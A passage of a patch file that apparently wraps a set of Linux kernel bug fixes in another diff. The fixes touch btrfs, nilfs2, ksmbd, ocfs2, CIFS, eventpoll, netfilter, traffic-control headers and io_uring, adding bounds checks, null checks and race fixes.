+ 	if (!(cci & UCSI_CCI_COMMAND_COMPLETE))
+ 		return -EIO;
+@@ -149,6 +147,11 @@ static int ucsi_exec_command(struct ucsi *ucsi, u64 cmd)
+ 		return ucsi_read_error(ucsi);
+ 	}
+ 
++	if (cmd == UCSI_CANCEL && cci & UCSI_CCI_CANCEL_COMPLETE) {
++		ret = ucsi_acknowledge_command(ucsi);
++		return ret ? ret : -EBUSY;
++	}
++
+ 	return UCSI_CCI_LENGTH(cci);
+ }
+ 
+diff --git a/fs/afs/vl_probe.c b/fs/afs/vl_probe.c
+index d1c7068b4346f..58452b86e6727 100644
+--- a/fs/afs/vl_probe.c
++++ b/fs/afs/vl_probe.c
+@@ -115,8 +115,8 @@ responded:
+ 		}
+ 	}
+ 
+-	if (rxrpc_kernel_get_srtt(call->net->socket, call->rxcall, &rtt_us) &&
+-	    rtt_us < server->probe.rtt) {
++	rxrpc_kernel_get_srtt(call->net->socket, call->rxcall, &rtt_us);
++	if (rtt_us < server->probe.rtt) {
+ 		server->probe.rtt = rtt_us;
+ 		server->rtt = rtt_us;
+ 		alist->preferred = index;
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index f33ddd5922b8c..74a5c94898b0f 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -2621,10 +2621,20 @@ int btrfs_inc_block_group_ro(struct btrfs_block_group *cache,
+ 	}
+ 
+ 	ret = inc_block_group_ro(cache, 0);
+-	if (!do_chunk_alloc || ret == -ETXTBSY)
+-		goto unlock_out;
+ 	if (!ret)
+ 		goto out;
++	if (ret == -ETXTBSY)
++		goto unlock_out;
++
++	/*
++	 * Skip chunk alloction if the bg is SYSTEM, this is to avoid system
++	 * chunk allocation storm to exhaust the system chunk array.  Otherwise
++	 * we still want to try our best to mark the block group read-only.
++	 */
++	if (!do_chunk_alloc && ret == -ENOSPC &&
++	    (cache->flags & BTRFS_BLOCK_GROUP_SYSTEM))
++		goto unlock_out;
++
+ 	alloc_flags = btrfs_get_alloc_profile(fs_info, cache->space_info->flags);
+ 	ret = btrfs_chunk_alloc(trans, alloc_flags, CHUNK_ALLOC_FORCE);
+ 	if (ret < 0)
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index ca69a46f10065..f22e00dfec6c4 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -1098,13 +1098,18 @@ int btrfs_global_root_insert(struct btrfs_root *root)
+ {
+ 	struct btrfs_fs_info *fs_info = root->fs_info;
+ 	struct rb_node *tmp;
++	int ret = 0;
+ 
+ 	write_lock(&fs_info->global_root_lock);
+ 	tmp = rb_find_add(&root->rb_node, &fs_info->global_root_tree, global_root_cmp);
+ 	write_unlock(&fs_info->global_root_lock);
+-	ASSERT(!tmp);
+ 
+-	return tmp ? -EEXIST : 0;
++	if (tmp) {
++		ret = -EEXIST;
++		btrfs_warn(fs_info, "global root %llu %llu already exists",
++				root->root_key.objectid, root->root_key.offset);
++	}
++	return ret;
+ }
+ 
+ void btrfs_global_root_delete(struct btrfs_root *root)
+@@ -2934,6 +2939,7 @@ static int __cold init_tree_roots(struct btrfs_fs_info *fs_info)
+ 			/* We can't trust the free space cache either */
+ 			btrfs_set_opt(fs_info->mount_opt, CLEAR_CACHE);
+ 
++			btrfs_warn(fs_info, "try to load backup roots slot %d", i);
+ 			ret = read_backup_root(fs_info, i);
+ 			backup_index = ret;
+ 			if (ret < 0)
+diff --git a/fs/btrfs/file-item.c b/fs/btrfs/file-item.c
+index 4fab7da632594..b14d2da9b26d3 100644
+--- a/fs/btrfs/file-item.c
++++ b/fs/btrfs/file-item.c
+@@ -717,7 +717,9 @@ blk_status_t btrfs_csum_one_bio(struct btrfs_inode *inode, struct bio *bio,
+ 				sums = kvzalloc(btrfs_ordered_sum_size(fs_info,
+ 						      bytes_left), GFP_KERNEL);
+ 				memalloc_nofs_restore(nofs_flag);
+-				BUG_ON(!sums); /* -ENOMEM */
++				if (!sums)
++					return BLK_STS_RESOURCE;
++
+ 				sums->len = bytes_left;
+ 				ordered = btrfs_lookup_ordered_extent(inode,
+ 								offset);
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index 56e9efbffd58e..c5583fc2a5855 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -1849,7 +1849,7 @@ static int can_nocow_file_extent(struct btrfs_path *path,
+ 
+ 	ret = btrfs_cross_ref_exist(root, btrfs_ino(inode),
+ 				    key->offset - args->extent_offset,
+-				    args->disk_bytenr, false, path);
++				    args->disk_bytenr, args->strict, path);
+ 	WARN_ON_ONCE(ret > 0 && is_freespace_inode);
+ 	if (ret != 0)
+ 		goto out;
+@@ -7387,7 +7387,7 @@ static struct extent_map *create_io_em(struct btrfs_inode *inode, u64 start,
+ static int btrfs_get_blocks_direct_write(struct extent_map **map,
+ 					 struct inode *inode,
+ 					 struct btrfs_dio_data *dio_data,
+-					 u64 start, u64 len,
++					 u64 start, u64 *lenp,
+ 					 unsigned int iomap_flags)
+ {
+ 	const bool nowait = (iomap_flags & IOMAP_NOWAIT);
+@@ -7398,6 +7398,7 @@ static int btrfs_get_blocks_direct_write(struct extent_map **map,
+ 	struct btrfs_block_group *bg;
+ 	bool can_nocow = false;
+ 	bool space_reserved = false;
++	u64 len = *lenp;
+ 	u64 prev_len;
+ 	int ret = 0;
+ 
+@@ -7468,15 +7469,19 @@ static int btrfs_get_blocks_direct_write(struct extent_map **map,
+ 		free_extent_map(em);
+ 		*map = NULL;
+ 
+-		if (nowait)
+-			return -EAGAIN;
++		if (nowait) {
++			ret = -EAGAIN;
++			goto out;
++		}
+ 
+ 		/*
+ 		 * If we could not allocate data space before locking the file
+ 		 * range and we can't do a NOCOW write, then we have to fail.
+ 		 */
+-		if (!dio_data->data_space_reserved)
+-			return -ENOSPC;
++		if (!dio_data->data_space_reserved) {
++			ret = -ENOSPC;
++			goto out;
++		}
+ 
+ 		/*
+ 		 * We have to COW and we have already reserved data space before,
+@@ -7517,6 +7522,7 @@ out:
+ 		btrfs_delalloc_release_extents(BTRFS_I(inode), len);
+ 		btrfs_delalloc_release_metadata(BTRFS_I(inode), len, true);
+ 	}
++	*lenp = len;
+ 	return ret;
+ }
+ 
+@@ -7693,7 +7699,7 @@ static int btrfs_dio_iomap_begin(struct inode *inode, loff_t start,
+ 
+ 	if (write) {
+ 		ret = btrfs_get_blocks_direct_write(&em, inode, dio_data,
+-						    start, len, flags);
++						    start, &len, flags);
+ 		if (ret < 0)
+ 			goto unlock_err;
+ 		unlock_extents = true;
+diff --git a/fs/btrfs/scrub.c b/fs/btrfs/scrub.c
+index c5d8dc112fd58..1672d4846baaf 100644
+--- a/fs/btrfs/scrub.c
++++ b/fs/btrfs/scrub.c
+@@ -4017,13 +4017,20 @@ int scrub_enumerate_chunks(struct scrub_ctx *sctx,
+ 
+ 		if (ret == 0) {
+ 			ro_set = 1;
+-		} else if (ret == -ENOSPC && !sctx->is_dev_replace) {
++		} else if (ret == -ENOSPC && !sctx->is_dev_replace &&
++			   !(cache->flags & BTRFS_BLOCK_GROUP_RAID56_MASK)) {
+ 			/*
+ 			 * btrfs_inc_block_group_ro return -ENOSPC when it
+ 			 * failed in creating new chunk for metadata.
+ 			 * It is not a problem for scrub, because
+ 			 * metadata are always cowed, and our scrub paused
+ 			 * commit_transactions.
++			 *
++			 * For RAID56 chunks, we have to mark them read-only
++			 * for scrub, as later we would use our own cache
++			 * out of RAID56 realm.
++			 * Thus we want the RAID56 bg to be marked RO to
++			 * prevent RMW from screwing up out cache.
+ 			 */
+ 			ro_set = 0;
+ 		} else if (ret == -ETXTBSY) {
+diff --git a/fs/cifs/file.c b/fs/cifs/file.c
+index 9a4c33ffb75fa..87dcffece7623 100644
+--- a/fs/cifs/file.c
++++ b/fs/cifs/file.c
+@@ -5146,9 +5146,13 @@ oplock_break_ack:
+ 	 * disconnected since oplock already released by the server
+ 	 */
+ 	if (!oplock_break_cancelled) {
+-		rc = tcon->ses->server->ops->oplock_response(tcon, persistent_fid,
++		/* check for server null since can race with kill_sb calling tree disconnect */
++		if (tcon->ses && tcon->ses->server) {
++			rc = tcon->ses->server->ops->oplock_response(tcon, persistent_fid,
+ 				volatile_fid, net_fid, cinode);
+-		cifs_dbg(FYI, "Oplock release rc = %d\n", rc);
++			cifs_dbg(FYI, "Oplock release rc = %d\n", rc);
++		} else
++			pr_warn_once("lease break not sent for unmounted share\n");
+ 	}
+ 
+ 	cifs_done_oplock_break(cinode);
+diff --git a/fs/eventpoll.c b/fs/eventpoll.c
+index 64659b1109733..eccecd3fac90c 100644
+--- a/fs/eventpoll.c
++++ b/fs/eventpoll.c
+@@ -1760,7 +1760,11 @@ static int ep_autoremove_wake_function(struct wait_queue_entry *wq_entry,
+ {
+ 	int ret = default_wake_function(wq_entry, mode, sync, key);
+ 
+-	list_del_init(&wq_entry->entry);
++	/*
++	 * Pairs with list_empty_careful in ep_poll, and ensures future loop
++	 * iterations see the cause of this wakeup.
++	 */
++	list_del_init_careful(&wq_entry->entry);
+ 	return ret;
+ }
+ 
+diff --git a/fs/ext4/balloc.c b/fs/ext4/balloc.c
+index a38aa33af08ef..8e83b51e3c68a 100644
+--- a/fs/ext4/balloc.c
++++ b/fs/ext4/balloc.c
+@@ -322,17 +322,15 @@ static ext4_fsblk_t ext4_valid_block_bitmap_padding(struct super_block *sb,
+ struct ext4_group_info *ext4_get_group_info(struct super_block *sb,
+ 					    ext4_group_t group)
+ {
+-	 struct ext4_group_info **grp_info;
+-	 long indexv, indexh;
+-
+-	 if (unlikely(group >= EXT4_SB(sb)->s_groups_count)) {
+-		 ext4_error(sb, "invalid group %u", group);
+-		 return NULL;
+-	 }
+-	 indexv = group >> (EXT4_DESC_PER_BLOCK_BITS(sb));
+-	 indexh = group & ((EXT4_DESC_PER_BLOCK(sb)) - 1);
+-	 grp_info = sbi_array_rcu_deref(EXT4_SB(sb), s_group_info, indexv);
+-	 return grp_info[indexh];
++	struct ext4_group_info **grp_info;
++	long indexv, indexh;
++
++	if (unlikely(group >= EXT4_SB(sb)->s_groups_count))
++		return NULL;
++	indexv = group >> (EXT4_DESC_PER_BLOCK_BITS(sb));
++	indexh = group & ((EXT4_DESC_PER_BLOCK(sb)) - 1);
++	grp_info = sbi_array_rcu_deref(EXT4_SB(sb), s_group_info, indexv);
++	return grp_info[indexh];
+ }
+ 
+ /*
+diff --git a/fs/ksmbd/connection.c b/fs/ksmbd/connection.c
+index bf8531b80a182..e1d2be19cddfa 100644
+--- a/fs/ksmbd/connection.c
++++ b/fs/ksmbd/connection.c
+@@ -366,8 +366,6 @@ int ksmbd_conn_handler_loop(void *p)
+ 			break;
+ 
+ 		memcpy(conn->request_buf, hdr_buf, sizeof(hdr_buf));
+-		if (!ksmbd_smb_request(conn))
+-			break;
+ 
+ 		/*
+ 		 * We already read 4 bytes to find out PDU size, now
+@@ -385,6 +383,9 @@ int ksmbd_conn_handler_loop(void *p)
+ 			continue;
+ 		}
+ 
++		if (!ksmbd_smb_request(conn))
++			break;
++
+ 		if (((struct smb2_hdr *)smb2_get_msg(conn->request_buf))->ProtocolId ==
+ 		    SMB2_PROTO_NUMBER) {
+ 			if (pdu_size < SMB2_MIN_SUPPORTED_HEADER_SIZE)
+diff --git a/fs/ksmbd/smb_common.c b/fs/ksmbd/smb_common.c
+index 95afb6b23a91c..05d7f3e910bf4 100644
+--- a/fs/ksmbd/smb_common.c
++++ b/fs/ksmbd/smb_common.c
+@@ -158,7 +158,19 @@ int ksmbd_verify_smb_message(struct ksmbd_work *work)
+  */
+ bool ksmbd_smb_request(struct ksmbd_conn *conn)
+ {
+-	return conn->request_buf[0] == 0;
++	__le32 *proto = (__le32 *)smb2_get_msg(conn->request_buf);
++
++	if (*proto == SMB2_COMPRESSION_TRANSFORM_ID) {
++		pr_err_ratelimited("smb2 compression not support yet");
++		return false;
++	}
++
++	if (*proto != SMB1_PROTO_NUMBER &&
++	    *proto != SMB2_PROTO_NUMBER &&
++	    *proto != SMB2_TRANSFORM_PROTO_NUM)
++		return false;
++
++	return true;
+ }
+ 
+ static bool supported_protocol(int idx)
+diff --git a/fs/nilfs2/btnode.c b/fs/nilfs2/btnode.c
+index e74fda212620b..ee2cde07264bb 100644
+--- a/fs/nilfs2/btnode.c
++++ b/fs/nilfs2/btnode.c
+@@ -285,6 +285,14 @@ void nilfs_btnode_abort_change_key(struct address_space *btnc,
+ 	if (nbh == NULL) {	/* blocksize == pagesize */
+ 		xa_erase_irq(&btnc->i_pages, newkey);
+ 		unlock_page(ctxt->bh->b_page);
+-	} else
+-		brelse(nbh);
++	} else {
++		/*
++		 * When canceling a buffer that a prepare operation has
++		 * allocated to copy a node block to another location, use
++		 * nilfs_btnode_delete() to initialize and release the buffer
++		 * so that the buffer flags will not be in an inconsistent
++		 * state when it is reallocated.
++		 */
++		nilfs_btnode_delete(nbh);
++	}
+ }
+diff --git a/fs/nilfs2/sufile.c b/fs/nilfs2/sufile.c
+index dc359b56fdfac..2c6078a6b8ecb 100644
+--- a/fs/nilfs2/sufile.c
++++ b/fs/nilfs2/sufile.c
+@@ -779,6 +779,15 @@ int nilfs_sufile_resize(struct inode *sufile, __u64 newnsegs)
+ 			goto out_header;
+ 
+ 		sui->ncleansegs -= nsegs - newnsegs;
++
++		/*
++		 * If the sufile is successfully truncated, immediately adjust
++		 * the segment allocation space while locking the semaphore
++		 * "mi_sem" so that nilfs_sufile_alloc() never allocates
++		 * segments in the truncated space.
++		 */
++		sui->allocmax = newnsegs - 1;
++		sui->allocmin = 0;
+ 	}
+ 
+ 	kaddr = kmap_atomic(header_bh->b_page);
+diff --git a/fs/nilfs2/the_nilfs.c b/fs/nilfs2/the_nilfs.c
+index 2894152a6b25c..0f0667957c810 100644
+--- a/fs/nilfs2/the_nilfs.c
++++ b/fs/nilfs2/the_nilfs.c
+@@ -405,6 +405,18 @@ unsigned long nilfs_nrsvsegs(struct the_nilfs *nilfs, unsigned long nsegs)
+ 				  100));
+ }
+ 
++/**
++ * nilfs_max_segment_count - calculate the maximum number of segments
++ * @nilfs: nilfs object
++ */
++static u64 nilfs_max_segment_count(struct the_nilfs *nilfs)
++{
++	u64 max_count = U64_MAX;
++
++	do_div(max_count, nilfs->ns_blocks_per_segment);
++	return min_t(u64, max_count, ULONG_MAX);
++}
++
+ void nilfs_set_nsegments(struct the_nilfs *nilfs, unsigned long nsegs)
+ {
+ 	nilfs->ns_nsegments = nsegs;
+@@ -414,6 +426,8 @@ void nilfs_set_nsegments(struct the_nilfs *nilfs, unsigned long nsegs)
+ static int nilfs_store_disk_layout(struct the_nilfs *nilfs,
+ 				   struct nilfs_super_block *sbp)
+ {
++	u64 nsegments, nblocks;
++
+ 	if (le32_to_cpu(sbp->s_rev_level) < NILFS_MIN_SUPP_REV) {
+ 		nilfs_err(nilfs->ns_sb,
+ 			  "unsupported revision (superblock rev.=%d.%d, current rev.=%d.%d). Please check the version of mkfs.nilfs(2).",
+@@ -457,7 +471,34 @@ static int nilfs_store_disk_layout(struct the_nilfs *nilfs,
+ 		return -EINVAL;
+ 	}
+ 
+-	nilfs_set_nsegments(nilfs, le64_to_cpu(sbp->s_nsegments));
++	nsegments = le64_to_cpu(sbp->s_nsegments);
++	if (nsegments > nilfs_max_segment_count(nilfs)) {
++		nilfs_err(nilfs->ns_sb,
++			  "segment count %llu exceeds upper limit (%llu segments)",
++			  (unsigned long long)nsegments,
++			  (unsigned long long)nilfs_max_segment_count(nilfs));
++		return -EINVAL;
++	}
++
++	nblocks = sb_bdev_nr_blocks(nilfs->ns_sb);
++	if (nblocks) {
++		u64 min_block_count = nsegments * nilfs->ns_blocks_per_segment;
++		/*
++		 * To avoid failing to mount early device images without a
++		 * second superblock, exclude that block count from the
++		 * "min_block_count" calculation.
++		 */
++
++		if (nblocks < min_block_count) {
++			nilfs_err(nilfs->ns_sb,
++				  "total number of segment blocks %llu exceeds device size (%llu blocks)",
++				  (unsigned long long)min_block_count,
++				  (unsigned long long)nblocks);
++			return -EINVAL;
++		}
++	}
++
++	nilfs_set_nsegments(nilfs, nsegments);
+ 	nilfs->ns_crc_seed = le32_to_cpu(sbp->s_crc_seed);
+ 	return 0;
+ }
+diff --git a/fs/ocfs2/file.c b/fs/ocfs2/file.c
+index 4d78e09795179..cae410568bb2e 100644
+--- a/fs/ocfs2/file.c
++++ b/fs/ocfs2/file.c
+@@ -2100,14 +2100,20 @@ static long ocfs2_fallocate(struct file *file, int mode, loff_t offset,
+ 	struct ocfs2_space_resv sr;
+ 	int change_size = 1;
+ 	int cmd = OCFS2_IOC_RESVSP64;
++	int ret = 0;
+ 
+ 	if (mode & ~(FALLOC_FL_KEEP_SIZE | FALLOC_FL_PUNCH_HOLE))
+ 		return -EOPNOTSUPP;
+ 	if (!ocfs2_writes_unwritten_extents(osb))
+ 		return -EOPNOTSUPP;
+ 
+-	if (mode & FALLOC_FL_KEEP_SIZE)
++	if (mode & FALLOC_FL_KEEP_SIZE) {
+ 		change_size = 0;
++	} else {
++		ret = inode_newsize_ok(inode, offset + len);
++		if (ret)
++			return ret;
++	}
+ 
+ 	if (mode & FALLOC_FL_PUNCH_HOLE)
+ 		cmd = OCFS2_IOC_UNRESVSP64;
+diff --git a/fs/ocfs2/super.c b/fs/ocfs2/super.c
+index 0b0e6a1321018..988d1c076861b 100644
+--- a/fs/ocfs2/super.c
++++ b/fs/ocfs2/super.c
+@@ -952,8 +952,10 @@ static void ocfs2_disable_quotas(struct ocfs2_super *osb)
+ 	for (type = 0; type < OCFS2_MAXQUOTAS; type++) {
+ 		if (!sb_has_quota_loaded(sb, type))
+ 			continue;
+-		oinfo = sb_dqinfo(sb, type)->dqi_priv;
+-		cancel_delayed_work_sync(&oinfo->dqi_sync_work);
++		if (!sb_has_quota_suspended(sb, type)) {
++			oinfo = sb_dqinfo(sb, type)->dqi_priv;
++			cancel_delayed_work_sync(&oinfo->dqi_sync_work);
++		}
+ 		inode = igrab(sb->s_dquot.files[type]);
+ 		/* Turn off quotas. This will remove all dquot structures from
+ 		 * memory and so they will be automatically synced to global
+diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h
+index fff61e6d6d4de..3660ce6a93496 100644
+--- a/include/linux/mlx5/driver.h
++++ b/include/linux/mlx5/driver.h
+@@ -1230,6 +1230,18 @@ static inline u16 mlx5_core_max_vfs(const struct mlx5_core_dev *dev)
+ 	return dev->priv.sriov.max_vfs;
+ }
+ 
++static inline int mlx5_lag_is_lacp_owner(struct mlx5_core_dev *dev)
++{
++	/* LACP owner conditions:
++	 * 1) Function is physical.
++	 * 2) LAG is supported by FW.
++	 * 3) LAG is managed by driver (currently the only option).
++	 */
++	return  MLX5_CAP_GEN(dev, vport_group_manager) &&
++		   (MLX5_CAP_GEN(dev, num_lag_ports) > 1) &&
++		    MLX5_CAP_GEN(dev, lag_master);
++}
++
+ static inline int mlx5_get_gid_table_len(u16 param)
+ {
+ 	if (param > 4) {
+diff --git a/include/linux/soc/qcom/llcc-qcom.h b/include/linux/soc/qcom/llcc-qcom.h
+index bc2fb8343a944..af093281e335c 100644
+--- a/include/linux/soc/qcom/llcc-qcom.h
++++ b/include/linux/soc/qcom/llcc-qcom.h
+@@ -57,9 +57,6 @@ struct llcc_slice_desc {
+ /**
+  * struct llcc_edac_reg_data - llcc edac registers data for each error type
+  * @name: Name of the error
+- * @synd_reg: Syndrome register address
+- * @count_status_reg: Status register address to read the error count
+- * @ways_status_reg: Status register address to read the error ways
+  * @reg_cnt: Number of registers
+  * @count_mask: Mask value to get the error count
+  * @ways_mask: Mask value to get the error ways
+@@ -68,9 +65,6 @@ struct llcc_slice_desc {
+  */
+ struct llcc_edac_reg_data {
+ 	char *name;
+-	u64 synd_reg;
+-	u64 count_status_reg;
+-	u64 ways_status_reg;
+ 	u32 reg_cnt;
+ 	u32 count_mask;
+ 	u32 ways_mask;
+@@ -108,7 +102,7 @@ struct llcc_edac_reg_offset {
+ 
+ /**
+  * struct llcc_drv_data - Data associated with the llcc driver
+- * @regmap: regmap associated with the llcc device
++ * @regmaps: regmaps associated with the llcc device
+  * @bcast_regmap: regmap associated with llcc broadcast offset
+  * @cfg: pointer to the data structure for slice configuration
+  * @edac_reg_offset: Offset of the LLCC EDAC registers
+@@ -117,12 +111,11 @@ struct llcc_edac_reg_offset {
+  * @max_slices: max slices as read from device tree
+  * @num_banks: Number of llcc banks
+  * @bitmap: Bit map to track the active slice ids
+- * @offsets: Pointer to the bank offsets array
+  * @ecc_irq: interrupt for llcc cache error detection and reporting
+  * @version: Indicates the LLCC version
+  */
+ struct llcc_drv_data {
+-	struct regmap *regmap;
++	struct regmap **regmaps;
+ 	struct regmap *bcast_regmap;
+ 	const struct llcc_slice_config *cfg;
+ 	const struct llcc_edac_reg_offset *edac_reg_offset;
+@@ -131,7 +124,6 @@ struct llcc_drv_data {
+ 	u32 max_slices;
+ 	u32 num_banks;
+ 	unsigned long *bitmap;
+-	u32 *offsets;
+ 	int ecc_irq;
+ 	u32 version;
+ };
+diff --git a/include/net/neighbour.h b/include/net/neighbour.h
+index 94a1599824d8f..794e45981891a 100644
+--- a/include/net/neighbour.h
++++ b/include/net/neighbour.h
+@@ -336,8 +336,6 @@ void neigh_table_init(int index, struct neigh_table *tbl);
+ int neigh_table_clear(int index, struct neigh_table *tbl);
+ struct neighbour *neigh_lookup(struct neigh_table *tbl, const void *pkey,
+ 			       struct net_device *dev);
+-struct neighbour *neigh_lookup_nodev(struct neigh_table *tbl, struct net *net,
+-				     const void *pkey);
+ struct neighbour *__neigh_create(struct neigh_table *tbl, const void *pkey,
+ 				 struct net_device *dev, bool want_ref);
+ static inline struct neighbour *neigh_create(struct neigh_table *tbl,
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index a1ccf1276f3ee..22e96b7e1b44a 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -457,7 +457,8 @@ struct nft_set_ops {
+ 					       const struct nft_set *set,
+ 					       const struct nft_set_elem *elem,
+ 					       unsigned int flags);
+-
++	void				(*commit)(const struct nft_set *set);
++	void				(*abort)(const struct nft_set *set);
+ 	u64				(*privsize)(const struct nlattr * const nla[],
+ 						    const struct nft_set_desc *desc);
+ 	bool				(*estimate)(const struct nft_set_desc *desc,
+@@ -552,6 +553,7 @@ struct nft_set {
+ 	u16				policy;
+ 	u16				udlen;
+ 	unsigned char			*udata;
++	struct list_head		pending_update;
+ 	/* runtime data below here */
+ 	const struct nft_set_ops	*ops ____cacheline_aligned;
+ 	u16				flags:14,
+diff --git a/include/net/sch_generic.h b/include/net/sch_generic.h
+index 989eb972fcaec..b3e3128402961 100644
+--- a/include/net/sch_generic.h
++++ b/include/net/sch_generic.h
+@@ -137,6 +137,13 @@ static inline void qdisc_refcount_inc(struct Qdisc *qdisc)
+ 	refcount_inc(&qdisc->refcnt);
+ }
+ 
++static inline bool qdisc_refcount_dec_if_one(struct Qdisc *qdisc)
++{
++	if (qdisc->flags & TCQ_F_BUILTIN)
++		return true;
++	return refcount_dec_if_one(&qdisc->refcnt);
++}
++
+ /* Intended to be used by unlocked users, when concurrent qdisc release is
+  * possible.
+  */
+@@ -650,6 +657,7 @@ void dev_deactivate_many(struct list_head *head);
+ struct Qdisc *dev_graft_qdisc(struct netdev_queue *dev_queue,
+ 			      struct Qdisc *qdisc);
+ void qdisc_reset(struct Qdisc *qdisc);
++void qdisc_destroy(struct Qdisc *qdisc);
+ void qdisc_put(struct Qdisc *qdisc);
+ void qdisc_put_unlocked(struct Qdisc *qdisc);
+ void qdisc_tree_reduce_backlog(struct Qdisc *qdisc, int n, int len);
+diff --git a/include/rdma/ib_addr.h b/include/rdma/ib_addr.h
+index d808dc3d239e8..811a0f11d0dbe 100644
+--- a/include/rdma/ib_addr.h
++++ b/include/rdma/ib_addr.h
+@@ -194,29 +194,6 @@ static inline enum ib_mtu iboe_get_mtu(int mtu)
+ 		return 0;
+ }
+ 
+-static inline int iboe_get_rate(struct net_device *dev)
+-{
+-	struct ethtool_link_ksettings cmd;
+-	int err;
+-
+-	rtnl_lock();
+-	err = __ethtool_get_link_ksettings(dev, &cmd);
+-	rtnl_unlock();
+-	if (err)
+-		return IB_RATE_PORT_CURRENT;
+-
+-	if (cmd.base.speed >= 40000)
+-		return IB_RATE_40_GBPS;
+-	else if (cmd.base.speed >= 30000)
+-		return IB_RATE_30_GBPS;
+-	else if (cmd.base.speed >= 20000)
+-		return IB_RATE_20_GBPS;
+-	else if (cmd.base.speed >= 10000)
+-		return IB_RATE_10_GBPS;
+-	else
+-		return IB_RATE_PORT_CURRENT;
+-}
+-
+ static inline int rdma_link_local_addr(struct in6_addr *addr)
+ {
+ 	if (addr->s6_addr32[0] == htonl(0xfe800000) &&
+diff --git a/include/sound/soc-acpi.h b/include/sound/soc-acpi.h
+index b38fd25c57295..528279056b3ab 100644
+--- a/include/sound/soc-acpi.h
++++ b/include/sound/soc-acpi.h
+@@ -170,6 +170,7 @@ struct snd_soc_acpi_link_adr {
+ /* Descriptor for SST ASoC machine driver */
+ struct snd_soc_acpi_mach {
+ 	u8 id[ACPI_ID_LEN];
++	const char *uid;
+ 	const struct snd_soc_acpi_codecs *comp_ids;
+ 	const u32 link_mask;
+ 	const struct snd_soc_acpi_link_adr *links;
+diff --git a/include/sound/soc-dpcm.h b/include/sound/soc-dpcm.h
+index 5b689c663290f..27a5642f07cda 100644
+--- a/include/sound/soc-dpcm.h
++++ b/include/sound/soc-dpcm.h
+@@ -125,6 +125,10 @@ int snd_soc_dpcm_can_be_free_stop(struct snd_soc_pcm_runtime *fe,
+ int snd_soc_dpcm_can_be_params(struct snd_soc_pcm_runtime *fe,
+ 		struct snd_soc_pcm_runtime *be, int stream);
+ 
++/* can this BE perform prepare */
++int snd_soc_dpcm_can_be_prepared(struct snd_soc_pcm_runtime *fe,
++				 struct snd_soc_pcm_runtime *be, int stream);
++
+ /* is the current PCM operation for this FE ? */
+ int snd_soc_dpcm_fe_can_update(struct snd_soc_pcm_runtime *fe, int stream);
+ 
+diff --git a/include/uapi/linux/ethtool_netlink.h b/include/uapi/linux/ethtool_netlink.h
+index bb57084ac524a..69f5bec347c20 100644
+--- a/include/uapi/linux/ethtool_netlink.h
++++ b/include/uapi/linux/ethtool_netlink.h
+@@ -761,7 +761,7 @@ enum {
+ 
+ 	/* add new constants above here */
+ 	__ETHTOOL_A_STATS_GRP_CNT,
+-	ETHTOOL_A_STATS_GRP_MAX = (__ETHTOOL_A_STATS_CNT - 1)
++	ETHTOOL_A_STATS_GRP_MAX = (__ETHTOOL_A_STATS_GRP_CNT - 1)
+ };
+ 
+ enum {
+diff --git a/include/uapi/linux/rtnetlink.h b/include/uapi/linux/rtnetlink.h
+index eb2747d58a813..51c13cf9c5aee 100644
+--- a/include/uapi/linux/rtnetlink.h
++++ b/include/uapi/linux/rtnetlink.h
+@@ -635,6 +635,7 @@ enum {
+ 	TCA_INGRESS_BLOCK,
+ 	TCA_EGRESS_BLOCK,
+ 	TCA_DUMP_FLAGS,
++	TCA_EXT_WARN_MSG,
+ 	__TCA_MAX
+ };
+ 
+@@ -788,6 +789,7 @@ enum {
+ 	TCA_ROOT_FLAGS,
+ 	TCA_ROOT_COUNT,
+ 	TCA_ROOT_TIME_DELTA, /* in msecs */
++	TCA_ROOT_EXT_WARN_MSG,
+ 	__TCA_ROOT_MAX,
+ #define	TCA_ROOT_MAX (__TCA_ROOT_MAX - 1)
+ };
+diff --git a/io_uring/net.c b/io_uring/net.c
+index f6d8b02387a9d..05792a6899944 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -65,6 +65,7 @@ struct io_sr_msg {
+ 	u16				addr_len;
+ 	u16				buf_group;
+ 	void __user			*addr;
++	void __user			*msg_control;
+ 	/* used only for send zerocopy */
+ 	struct io_kiocb 		*notif;
+ };
+@@ -182,11 +183,15 @@ static int io_sendmsg_copy_hdr(struct io_kiocb *req,
+ 			       struct io_async_msghdr *iomsg)
+ {
+ 	struct io_sr_msg *sr = io_kiocb_to_cmd(req, struct io_sr_msg);
++	int ret;
+ 
+ 	iomsg->msg.msg_name = &iomsg->addr;
+ 	iomsg->free_iov = iomsg->fast_iov;
+-	return sendmsg_copy_msghdr(&iomsg->msg, sr->umsg, sr->msg_flags,
++	ret = sendmsg_copy_msghdr(&iomsg->msg, sr->umsg, sr->msg_flags,
+ 					&iomsg->free_iov);
++	/* save msg_control as sys_sendmsg() overwrites it */
++	sr->msg_control = iomsg->msg.msg_control;
++	return ret;
+ }
+ 
+ int io_send_prep_async(struct io_kiocb *req)
+@@ -284,6 +289,7 @@ int io_sendmsg(struct io_kiocb *req, unsigned int issue_flags)
+ 
+ 	if (req_has_async_data(req)) {
+ 		kmsg = req->async_data;
++		kmsg->msg.msg_control = sr->msg_control;
+ 	} else {
+ 		ret = io_sendmsg_copy_hdr(req, &iomsg);
+ 		if (ret)
+diff --git a/io_uring/sqpoll.c b/io_uring/sqpoll.c
+index 559652380672c..6ffa5cf1bbb86 100644
+--- a/io_uring/sqpoll.c
++++ b/io_uring/sqpoll.c
+@@ -256,9 +256,13 @@ static int io_sq_thread(void *data)
+ 			sqt_spin = true;
+ 
+ 		if (sqt_spin || !time_after(jiffies, timeout)) {
+-			cond_resched();
+ 			if (sqt_spin)
+ 				timeout = jiffies + sqd->sq_thread_idle;
++			if (unlikely(need_resched())) {
++				mutex_unlock(&sqd->lock);
++				cond_resched();
++				mutex_lock(&sqd->lock);
++			}
+ 			continue;
+ 		}
+ 
